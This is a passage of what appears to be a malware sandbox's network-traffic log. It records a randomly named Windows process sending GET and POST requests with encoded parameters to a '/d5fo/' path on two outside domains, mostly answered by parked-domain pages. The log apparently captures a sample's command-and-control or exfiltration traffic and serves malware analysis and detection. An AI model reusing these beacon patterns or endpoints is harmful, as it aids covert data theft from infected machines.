Jul 25, 2024 12:07:30.411253929 CEST	333	IN	HTTP/1.1 405 Not Allowed Date: Thu, 25 Jul 2024 10:07:30 GMT Content-Type: text/html Content-Length: 154 Connection: close Server: UD Webspace 3.2 Allow: GET, POST, HEAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	89.31.143.90	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:07:32.358485937 CEST	485	OUT	GET /d5fo/?7b7D=ZpdAgvspmy+hTWfIGO3yX+xvrXsAMei4bBOt8BxrswmHE1awNdipNiT+j4hdfFyjFWMSgEHKkrcEvKgvyxqjFaD+81oW/DCEN2Oo1sUO/kySitSS9PIrivUN0n61HzGWTA==&jlx=Zd48SBF0d HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.pandafitnessboo.com Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Jul 25, 2024 12:07:32.997857094 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 10:07:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: UD Webspace 3.2 Data Raw: 31 39 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69 73 74 72 69 65 72 74 20 62 65 69 20 75 6e 69 74 65 64 2d 64 6f 6d 61 69 6e 73 2e 64 65 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 69 6d 20 4b 75 6e 64 65 6e 61 75 66 74 72 61 67 20 72 65 67 69 73 74 72 69 65 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 2c 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 [TRUNCATED] Data Ascii: 19e0<!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,html{height:100%;margin:0;padding:0;background-color:#fff;font-family:Arial,Verdana,sans-serif}body{text-align:center;background-color:#f0f2f3}.spacerTop{margin-top:40px}a:focus,a:hover,a:link,a:visited{margin:0;padding:0;border:none}.dvLink:focus,.dvLink:hover,.dvLink:link,.dvLink:visited{background:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAJCAYAAAARml2dAAAAHklEQVQImWNgqDzxn6HyxH8GDACToIckhYLIEmgAAAHCOEFxKWXwAAAAAElFTkSuQmCC') right center no-repeat;padding-right:12px;border:0 none;text-decoration:none;font-weight:400;color:#0079c8}.dvLink:hover{text-decoration:underline}.dvLink.no-ico{background:0 0;padding:0}.logo-wrapper{width:100%;background-color:#fff;padding:55px 0}#logo{margin:0 auto;width:600px;height:50px;background-position:left [TRUNCATED]
Jul 25, 2024 12:07:32.998070955 CEST	224	IN	Data Raw: 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 2c 30 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 Data Ascii: kground-size:contain,0 0;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUAAAAAyCAMAAAAa0/LmAAAARVBMVEUAAADw8vTf5/Dd3d3P2ujPz8+/zuHCwsKvwtmfttGxsbGPqsqampp/nsKMjIxni7d+fn5QeqxnZ2dAbqQwYp0XTpEAPYad8GA6AAA
Jul 25, 2024 12:07:32.998081923 CEST	1236	IN	Data Raw: 41 41 58 52 53 54 6c 4d 41 51 4f 62 59 5a 67 41 41 42 38 70 4a 52 45 46 55 65 4e 72 74 6d 6f 75 53 6f 79 6f 51 51 42 73 78 43 42 68 41 35 50 48 2f 6e 33 70 74 6e 6f 62 64 5a 4a 78 39 31 63 79 74 6e 4b 70 4a 43 45 4c 54 48 6b 48 4a 62 75 44 4e 39 Data Ascii: AAXRSTlMAQObYZgAAB8pJREFUeNrtmouSoyoQQBsxCBhA5PH/n3ptnobdZJx91cytnKpJCELTHkHJbuDN94WwVSFihjefhggXYwwhRHyzHN58BqJCDEbNal1nE5Eg4M1lePB2JcSGeMK/V/JVjCU438SqQjzznoSXIH6FyqScESIWgoE3F/wJqMxhSm/MWhRo4tvgx1gBHUZayfuofFzh/wpTDP4Eyjzb1oCPB/M/OhvF4F9C8O
Jul 25, 2024 12:07:32.998990059 CEST	1236	IN	Data Raw: 73 63 79 69 75 43 51 78 59 4d 70 38 57 4f 50 2f 34 37 66 2f 31 50 56 42 78 48 73 2f 34 75 54 79 71 77 78 51 37 63 35 2b 38 34 7a 32 77 33 36 44 37 57 50 79 31 51 48 2b 36 4b 4f 79 53 51 47 51 32 46 7a 65 43 4e 61 50 36 2b 48 54 58 42 4d 62 7a 58 Data Ascii: scyiuCQxYMp8WOP/47f/1PVBxHs/4uTyqwxQ7c5+84z2w36D7WPy1QH+6KOySQGQ2FzeCNaP6+HTXBMbzXdxAQQC8fgrPZlxQ3saRAM+fwudrVsqRvBZ4ztdeEDhNkDAXBfL4gPlQYKjGmaqdg+GMKRMiPOwDWd8HVjwhLr6kXw9VPjIgvO4Dq0lft57Y/KXAni9wFy8IVNGblbE1XBM47venDwXa2IBxPo1X5AeBqxie3aE8RY
Jul 25, 2024 12:07:32.999001980 CEST	448	IN	Data Raw: 6f 4f 38 66 56 32 78 45 52 4a 7a 51 74 6d 65 45 66 2f 65 4a 37 66 39 7a 47 34 45 31 65 36 6c 53 55 2b 53 46 79 50 2b 6f 49 33 65 38 34 34 58 41 39 6f 55 42 4a 6c 31 7a 52 42 57 36 79 50 45 69 32 74 75 5a 36 48 30 6b 6c 31 75 61 61 51 53 44 46 45 Data Ascii: oO8fV2xERJzQtmeEf/eJ7f9zG4E1e6lSU+SFyP+oI3e844XA9oUBJl1zRBW6yPEi2tuZ6H0kl1uaaQSDFEbLAJd0nkG2XOHMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC');overflo
Jul 25, 2024 12:07:33.000569105 CEST	1236	IN	Data Raw: 7d 2e 68 65 61 64 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 36 30 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 38 70 78 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e Data Ascii: }.header{margin:0 auto;width:600px;padding:38px 0;text-align:left;font-size:14px}.title{margin:0;font-size:23px;color:#fff;font-weight:400}.content-wrapper{margin:0 auto;text-align:center;background-color:#fff}.content{width:600px;margin:0 aut
Jul 25, 2024 12:07:33.000582933 CEST	1174	IN	Data Raw: 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 44 6f 6d 61 69 6e 2d 50 6f 72 74 66 6f 6c 69 6f 3c 2f 61 3e 20 6a 65 64 65 72 7a 65 69 74 20 73 65 6c 62 73 74 20 6f 6e 6c 69 6e 65 20 6b 6f 6e 66 69 67 75 72 69 65 72 65 6e 20 28 Data Ascii: l="nofollow noopener">Domain-Portfolio</a> jederzeit selbst online konfigurieren (z.B. Web-Weiterleitungen, E-Mail-Einstellungen, Webspace hinzubuchen, Homepage-Baukasten bestellen, DNS-Einträge ändern).</p><p class="spacerTop"><b>un

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49718	217.76.156.252	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:07:38.204941988 CEST	744	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.biotecnology.org Origin: http://www.biotecnology.org Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Referer: http://www.biotecnology.org/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 56 30 52 55 59 56 59 68 48 61 59 6d 54 79 34 48 64 6d 64 2b 6f 38 5a 76 57 78 65 4e 57 67 7a 70 47 65 6d 57 33 74 61 2b 49 48 4d 39 7a 67 77 53 4c 46 69 56 46 64 30 30 45 6a 68 47 32 30 53 79 4d 36 76 47 6c 44 30 4d 7a 58 43 42 79 49 50 31 79 77 4e 4f 62 6b 47 2b 56 52 49 57 38 6b 4b 72 57 39 46 48 30 6f 55 4d 72 74 6b 61 67 2f 69 32 71 66 4d 38 4a 33 59 43 59 79 39 76 62 67 46 30 71 4a 77 46 4b 48 4e 73 53 6a 42 43 6c 42 59 32 36 53 44 65 6e 49 2b 62 6d 39 63 32 47 6b 64 32 71 52 52 32 58 42 64 55 76 31 59 37 7a 42 4b 35 55 50 63 57 65 72 44 31 64 54 48 46 73 4d 44 4e 34 64 5a 6d 77 58 55 3d Data Ascii: 7b7D=V0RUYVYhHaYmTy4Hdmd+o8ZvWxeNWgzpGemW3ta+IHM9zgwSLFiVFd00EjhG20SyM6vGlD0MzXCByIP1ywNObkG+VRIW8kKrW9FH0oUMrtkag/i2qfM8J3YCYy9vbgF0qJwFKHNsSjBClBY26SDenI+bm9c2Gkd2qRR2XBdUv1Y7zBK5UPcWerD1dTHFsMDN4dZmwXU=
Jul 25, 2024 12:07:38.898971081 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Jul 2024 10:07:38 GMT Server: Apache X-ServerIndex: llim605 Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f [TRUNCATED] Data Ascii: 1aa7<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.biotecnology.org</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la página de:</p> [TRUNCATED]
Jul 25, 2024 12:07:38.899574995 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 Data Ascii: <h1>www.biotecnology.org</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PE
Jul 25, 2024 12:07:38.899610996 CEST	1236	IN	Data Raw: 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 64 65 73 70 6c 65 67 61 72 2e 6a 70 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 57 45 42 20 41 4c 4f 4a 41 44 41 20 45 4e 20 50 49 45 4e Data Ascii: solutions.com/imgs/parking/icon-desplegar.jpg"> <span>WEB ALOJADA EN PIENSA SOLUTIONS</span> <p>Si quieres obtener más información para crear tu propio proyecto online, consulta nuestros productos en la parte in
Jul 25, 2024 12:07:38.900660038 CEST	1236	IN	Data Raw: 63 69 6f 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 3e 76 65 72 20 6d 26 61 61 63 75 74 65 3b 73 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 3c Data Ascii: cio.</p> <button>ver más</button> </article></a> <a href="https://www.piensasolutions.com/crear-web?utm_source=parking&utm_medium=link&utm_campaign=web"><article> <img
Jul 25, 2024 12:07:38.900696039 CEST	1236	IN	Data Raw: 20 20 3c 68 32 3e 43 4f 52 52 45 4f 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 43 6f 72 72 65 6f 20 63 6f 6e 20 61 63 63 65 73 6f 20 73 65 67 75 72 6f 20 70 61 72 61 20 74 75 73 20 62 75 7a 6f 6e 65 73 2e 20 43 Data Ascii: <h2>CORREO</h2> <p>Correo con acceso seguro para tus buzones. Con funcionalidades colaborativas. </p> <button>ver más</button> </article></a>--> </div> </div></section>
Jul 25, 2024 12:07:38.902220011 CEST	872	IN	Data Raw: 6b 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 22 Data Ascii: ks"> <li> <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="Sguenos en Facebook"> <img src="https://piensasolutions.com/imgs/parking/icon-facebook-small.png"></div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49719	217.76.156.252	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:07:40.730590105 CEST	764	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.biotecnology.org Origin: http://www.biotecnology.org Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Referer: http://www.biotecnology.org/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 56 30 52 55 59 56 59 68 48 61 59 6d 53 53 49 48 66 42 42 2b 75 63 5a 67 54 78 65 4e 63 41 79 75 47 65 71 57 33 73 76 6a 49 78 30 39 7a 42 67 53 4b 42 32 56 45 64 30 30 4d 44 68 66 72 6b 53 48 4d 36 7a 30 6c 42 77 4d 7a 58 57 42 79 49 2f 31 79 44 6c 4a 62 30 47 34 4e 68 49 51 6b 45 4b 72 57 39 46 48 30 6f 51 6d 72 74 73 61 6e 50 53 32 74 4f 4d 2f 4b 33 59 4e 49 69 39 76 66 67 46 34 71 4a 77 73 4b 47 68 4b 53 68 4a 43 6c 42 6f 32 36 67 37 64 74 49 2b 5a 6f 64 63 6d 49 33 77 4a 71 58 41 37 65 68 73 38 2b 56 30 39 2f 58 6e 54 4f 74 55 2b 4e 4c 76 4e 4e 41 50 79 39 38 69 6b 69 2b 4a 57 75 41 43 4c 33 43 73 6b 6f 77 75 53 53 72 2b 30 6a 55 77 4f 6c 79 4a 6a Data Ascii: 7b7D=V0RUYVYhHaYmSSIHfBB+ucZgTxeNcAyuGeqW3svjIx09zBgSKB2VEd00MDhfrkSHM6z0lBwMzXWByI/1yDlJb0G4NhIQkEKrW9FH0oQmrtsanPS2tOM/K3YNIi9vfgF4qJwsKGhKShJClBo26g7dtI+ZodcmI3wJqXA7ehs8+V09/XnTOtU+NLvNNAPy98iki+JWuACL3CskowuSSr+0jUwOlyJj
Jul 25, 2024 12:07:41.434489012 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Jul 2024 10:07:41 GMT Server: Apache X-ServerIndex: llim604 Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f [TRUNCATED] Data Ascii: 1aa7<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.biotecnology.org</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la página de:</p> [TRUNCATED]
Jul 25, 2024 12:07:41.434638023 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 Data Ascii: <h1>www.biotecnology.org</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PE
Jul 25, 2024 12:07:41.434645891 CEST	1236	IN	Data Raw: 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 64 65 73 70 6c 65 67 61 72 2e 6a 70 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 57 45 42 20 41 4c 4f 4a 41 44 41 20 45 4e 20 50 49 45 4e Data Ascii: solutions.com/imgs/parking/icon-desplegar.jpg"> <span>WEB ALOJADA EN PIENSA SOLUTIONS</span> <p>Si quieres obtener más información para crear tu propio proyecto online, consulta nuestros productos en la parte in
Jul 25, 2024 12:07:41.436089039 CEST	1236	IN	Data Raw: 63 69 6f 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 3e 76 65 72 20 6d 26 61 61 63 75 74 65 3b 73 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 3c Data Ascii: cio.</p> <button>ver más</button> </article></a> <a href="https://www.piensasolutions.com/crear-web?utm_source=parking&utm_medium=link&utm_campaign=web"><article> <img
Jul 25, 2024 12:07:41.436105967 CEST	1236	IN	Data Raw: 20 20 3c 68 32 3e 43 4f 52 52 45 4f 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 43 6f 72 72 65 6f 20 63 6f 6e 20 61 63 63 65 73 6f 20 73 65 67 75 72 6f 20 70 61 72 61 20 74 75 73 20 62 75 7a 6f 6e 65 73 2e 20 43 Data Ascii: <h2>CORREO</h2> <p>Correo con acceso seguro para tus buzones. Con funcionalidades colaborativas. </p> <button>ver más</button> </article></a>--> </div> </div></section>
Jul 25, 2024 12:07:41.437906027 CEST	872	IN	Data Raw: 6b 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 22 Data Ascii: ks"> <li> <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="Sguenos en Facebook"> <img src="https://piensasolutions.com/imgs/parking/icon-facebook-small.png"></div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49720	217.76.156.252	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:07:43.266804934 CEST	1781	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.biotecnology.org Origin: http://www.biotecnology.org Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1241 Referer: http://www.biotecnology.org/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 56 30 52 55 59 56 59 68 48 61 59 6d 53 53 49 48 66 42 42 2b 75 63 5a 67 54 78 65 4e 63 41 79 75 47 65 71 57 33 73 76 6a 49 79 55 39 77 32 67 53 4c 6a 65 56 48 64 30 30 47 6a 68 61 72 6b 53 67 4d 36 71 39 6c 42 73 32 7a 56 75 42 7a 71 33 31 30 32 5a 4a 4f 45 47 34 52 52 49 52 38 6b 4c 32 57 39 56 44 30 6f 41 6d 72 74 73 61 6e 4d 4b 32 37 50 4d 2f 4d 33 59 43 59 79 39 6a 62 67 45 6e 71 4e 6b 64 4b 47 6b 33 53 52 70 43 6c 68 34 32 70 6a 44 64 33 49 2b 48 6c 39 64 35 49 33 38 6f 71 54 5a 49 65 68 70 58 2b 55 41 39 39 6a 79 2f 62 6f 30 6b 65 34 6a 76 4a 77 44 72 67 5a 36 33 38 76 4a 6e 75 33 72 73 30 53 6c 47 6c 31 69 2f 58 6f 4c 4d 33 51 67 55 6c 56 4e 69 35 6c 32 47 31 6e 77 58 62 4a 37 56 6a 6d 31 53 66 57 4d 51 72 57 44 6b 57 35 62 59 49 76 70 44 73 51 48 4c 44 42 34 4e 62 75 67 33 39 2f 45 56 36 57 36 32 4b 41 34 38 53 4b 35 53 45 6e 7a 79 4c 4b 52 30 70 61 6e 41 57 47 72 61 70 4b 4a 69 65 61 45 2b 49 43 33 49 6b 2f 4d 4f 34 4d 49 65 2b 67 39 52 5a 6b 71 71 31 41 53 64 61 37 74 62 55 [TRUNCATED] Data Ascii: 